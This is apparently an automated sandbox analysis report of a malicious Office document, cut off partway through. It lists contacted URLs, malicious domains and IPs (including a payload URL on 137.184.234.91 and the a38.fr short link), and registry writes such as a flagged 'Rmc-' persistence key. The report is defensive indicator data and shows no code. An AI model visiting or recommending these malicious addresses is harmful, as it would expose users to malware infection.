https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
https://a38.fr/
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://www.imvu.com/0K
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://contextual.media.net/
unknown
http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFj
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
https://a38.fr/GQ1oBm
45.83.105.92
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://a38.fr/GQ1oBmyX
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 67 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
a38.fr
45.83.105.92
 malicious
ia803104.us.archive.org
207.241.232.154
 malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
137.184.234.91
unknown
United States
malicious
207.241.232.154
ia803104.us.archive.org
United States
malicious
45.90.89.98
unknown
Bulgaria
malicious
45.83.105.92
a38.fr
Germany
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Rmc-O0U3JA
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-O0U3JA
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-O0U3JA
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
,e0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28D42
28D42
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
vm0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\37B57
37B57
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\37C70
37C70
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\37D3B
37D3B
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\37C70
37C70
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
l,1
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
i-1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://a38.fr/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
$m1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32F69
32F69
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
